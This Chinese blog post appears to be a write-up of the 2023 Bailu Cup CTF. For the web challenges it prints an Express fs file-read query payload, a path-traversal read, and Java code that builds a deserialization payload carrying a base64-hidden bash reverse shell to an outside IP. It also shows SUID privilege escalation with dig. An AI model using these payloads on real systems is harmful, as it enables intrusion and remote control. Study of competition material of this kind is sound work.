2023柏鹭杯

2023柏鹭杯

WEB

express fs

参考:https://www.cnblogs.com/91ac0m0/p/17557039.html

1
?file[protocol]=file:&file[href]=a&file[pathname]=fl%2561g.txt&file[hostname]=&file[origin]=x

综合题5

源码中有/readfile?filename=

目录穿越读文件/../../../../../app/demo.jar

拿到源码

Upload.class,upload类中有混淆加密的flag1

img

逆向一下得到flag1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import java.util.Base64;

public class ReverseUpload {
    private String O0O = "6925cc02789c1d2552b71acc4a2d48fd";

    public static void main(String[] args) {
        ReverseUpload uploader = new ReverseUpload();
        String originalEncFlag1 = uploader.decryptEncFlag1();
        System.out.println("Original enc_flag1: " + originalEncFlag1);
    }

    private String decryptEncFlag1() {
        String base64EncodedFlag1 = "UFVTUhgqY3d0FQxRVFcHBlQLVwdSVlZRVlJWBwxeVgAHWgsBWgUAAQEJRA==";
        byte[] decodedBytes = Base64.getDecoder().decode(base64EncodedFlag1);
        String decodedString = new String(decodedBytes);

        StringBuilder decryptedFlag = new StringBuilder();
        for (int i = 0; i < decodedString.length(); i++) {
            char originalChar = decodedString.charAt(i);
            char oOO = this.O0O.charAt(i % this.O0O.length());
            char encryptedChar = (char) (originalChar ^ oOO);
            decryptedFlag.append(encryptedChar);
        }

        return decryptedFlag.toString();
    }
}

//Original enc_flag1: flag{ISEC-52e353a950c752b3dc8f0d1c949f0361}

综合题6

源码中Ping.class是一个恶意类,readObject反序列化,exec可以命令执行

img

通过Upload类的/internalApi/v3.2/updateConfig此路由可以反序列化加载恶意类Ping进行命令执行

img

Ser.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
package com.example.demo;

import java.io.*;
import java.util.Base64;

public class Ser {
    public static void main(String[] args) throws Exception{
        // Create a Ping object
        Ping ping = new Ping();
        ping.setCommand("bash");
        ping.setArg1("-c");
        ping.setArg2("bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjI1MS42Mi80NTY3IDA+JjE=}|{base64,-d}|{bash,-i}'");

        // Serialize the Ping object to a byte array
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(ping);

        // Encode the byte array to Base64
        String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println("Payload: " + payload);
    }
}
//Payload: rO0ABXNyABVjb20uZXhhbXBsZS5kZW1vLlBpbmcAAAAAAAAAAQIAA0wABGFyZzF0ABJMamF2YS9sYW5nL1N0cmluZztMAARhcmcycQB+AAFMAAdjb21tYW5kcQB+AAF4cHQAAi1jdABfYmFzaCAtYyAne2VjaG8sWW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eExqRXlMakkxTVM0Mk1pODBOVFkzSURBK0pqRT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfSd0AARiYXNo

反弹shell

img

find找suid,dig提权,/usr/bin/dig -f /root/flag2

img

综合题7

这题当时差一点时间没打出来,当时上传了msf马到服务器上搭好了隧道redis写了ssh的公钥

赛后看了很多师傅的wp,都是用frp代理进去,写公钥后连上去即可

具体参考

星盟 V3g3t4ble fushulingのblog

MISC

签到

每一行的空格数量为flag的ascii,转一下得到flag

1
2
3
4
5
6
7
x = ''
with open('qd.txt','r') as f:
    aa = f.readlines()
    for i in aa:
        x += chr(len(i)-1)
print(x)
#flag{ISEC-eF8x2Bv1viw9eFvagivx0Ynv3jlai0vL}
ctf web misc
#misc #wp #web
2023柏鹭杯
http://example.com/2023/10/18/2023柏鹭杯/
作者
dddkia
发布于
2023年10月18日
许可协议